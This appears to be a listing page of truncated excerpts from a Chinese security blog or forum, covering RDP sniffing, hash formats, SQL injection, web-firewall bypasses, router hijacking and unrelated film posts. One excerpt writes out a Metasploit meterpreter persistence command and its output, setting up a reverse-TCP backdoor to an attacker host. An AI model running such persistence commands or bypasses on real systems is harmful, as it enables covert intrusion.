想了想，标题还是不写“打假”了（免得影响人家生意），严格的来说，这个不能说是假的，只能说是很狗血…… 起因，乌云看到个帖子： 远控U盘 大家进来看

昨天晚上开始嗅探，好家伙好几百个包，网上搜了一下有一款工具叫“Cain RDP Parser”，好家伙，一个一个选，玩死人的。。。索性写了个PHP脚

真特么的巧，中午吃饭听说一个被中奖骗了的农民工，当时心里就琢磨，可以不可以利用银行的流程，先打钱，再撤销来骗钱……然后特么下午就看到糗百上来

国内某邮件服务商，近期在某南方地区有大量客户反应登录时出错和异常，于是工作人员进行了一下跟进，发现如下： 首先，邮件服务商登陆页面为普通HTT

看到博客有人问，其实这是个很简单、很基础的东西，但仍有很多人根本不知道，这里简单讲一下…… 1、举个例子，你某日干某事（你懂的）看到一串密文：

---------------*nix系------------------------ 系统：ES(Unix) 例子: IvS7aeT4NzQPM 说明：Linux或者其

捞一把就走，这话适合各行各业，也适用于微博。 一个朋友说““啪啪来了，给微博一耳光，陌陌来了，给微博一耳光，微信来了，给微博啪啪啪好几个耳光“

前几天一个朋友让我帮他检测一下他网站程序的安全，为了不让我的面子掉一地只有硬着头皮帮他检测啦！ 拿到他的源程序之后就开始我的检测之路啦！ 首先我

1.meterpreter自带脚本 方法1.run presistence 可以使用run presistence -h查看选项： meterpreter > run persistence -U -i 5 -p 443 -r 192.168.1.139 [*] Running Persistance Script [*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN03SP0_20130122.2044/WIN03SP0_20130122.2044.rc [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.139 LPORT=443 [*] Persistent

流言终结者：一条错误的命令引起的血案…… 流言终结者：“看哥是怎么突破安全狗和360网站卫士的”的种种疑问…… 标题神马都是浮云…… 看哥是怎么突

Audacity，一款很不错的专业音频处理工具…… 关于它：百度百科、官方网站 Audacity是一款易于使用、多语言的音频编辑器和录音器，它是

//这个以前在空间里有简要说明过这个常见的小问题，也把它搬到乌云来放在一起，以后好找点！ Java异常处理机制（Exception）简要说明：

进来蛋疼 肾是疼 可能是测试娃娃测试的太多了。 前几天朋友让我帮他检测下他的网站安全性，网站发来一看。哇靠，又是安全狗，又是360网站卫士，这可怎

Inception能入侵全盘加密的计算机 一刀终情 ((这个怎么实现的呢？) ?(1314520)) | 2013-01-21 17:46 最近发现的一种攻击方式可以让物理接触的攻击者入侵全盘加密的计

一种可能的新的漏洞类型 xsser (十根阳具有长短!!) | 2013-01-21 11:15 这个问题切实存在的，本人经历过 if($code=='xxxxx'){ .... updatecoin(); updatecode(); .... }else{ exit(); } 就是说系统可能给你个code，用于你兑奖买

Name : Baidu Related Searches Crawler (百度相关搜索抓取工具) Version: 1.0 Author : Nuclear'Atk, url: https://lcx.cc/ Command: word : [必选] 指定初始关键词（抓取该关键词的相关搜索词） -m x : [可选] 抓取到x个关键词后自

继续发老文档，这片是我09年分析PHP宽字节绕过addslashes等常用SQL注入过滤语句时写的分析文档。刚才发struts那篇文档，这篇

此文是我前年研究struts框架相关安全特性做的总结，这里发上来，各位安全工作人员在查找Struts相关应用的漏洞有一定用处，但因为是去年的

//ps: 这也是个常见的问题，都知道，但为什么还是有人犯这个错误了（不是每个互联网公司都有SDL的，目前来看，公司业务大，架构不一定完整，安全架构更

转载不加作者名的没JJ 哎。没意识，我一个月前就发现了这个漏洞，一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷

农行网银体验机它可以浏览农行的网站，而在农行的网页上存在一个下载的文档的地址比如（ http://www.abchina.com/cn/investor-relations/announcements/a-announcement/201301/t20130114_308825.htm ），我们可以利用它浏览到文件夹，到了文件夹你在说不知道怎

谷歌曾在去年的I/O大会上正式展示了其最新研发谷歌眼镜产品，不过该项目主管Babak Parviz在随后的访谈中表示，谷歌眼镜目前仍处在设计阶

尼玛 迅雷真的突破物理带宽了。！！ 明. | 2013-01-17 20:28 迅雷智能提速，是和电信合作的。！！求原理。 1# Mujj (www.80host.com) | 2013-01-17 20:53 热门资源才行，冷门资源还是从源站下，热门资源

今天来自Verizon 2012年的一个团队案例研究让我们见识了什么叫高手。有一个在美国基础架构公司谋职的开发者，据称叫Bob，去年因为把工作

“我们受害人的QQ群里共113人，除3个人的钱是被转到另一个网游平台之外，其余110人均被转到巨人网络，光我们这些人的金额就有262万之多。

之前写的一个简单的通过google搜索结果自动反编译flash文件并进行审计的工具。 代码是从以前写的其他代码中扣过来的，很烂，用的时候就将就

WooYun 有人问： 盗单是什么意思？ 把单偷过来自己发货给别人么？ 1# 斯文的鸡蛋 (以前在网上，没人知道你是一条狗；现在在网上，狗都知) | 2013-01-16 09:12 应该是截单吧？

电影推荐：偶滴神啊.720p.BD中英双字幕，强大的宗教逻辑，颠覆你的世界观。 印度产的一部电影，很另类，剧情绝对强大…… 主要讲的是宗教信仰，

本人阅片无数，好的坏的，强大的，巨烂的看过无数，能让我推荐的影片真的不多…… 爆米花电影、秀特效之类的就不说了（在电影院吃爆米花看特效那种，毫

想了解下，关于用路由器来劫持的一些内容 小猪太子 | 2013-01-15 22:22 不知道有没有人做过路由劫持，我觉得应该可以实现的。 就是通过路由器，劫持域名到指向指定的I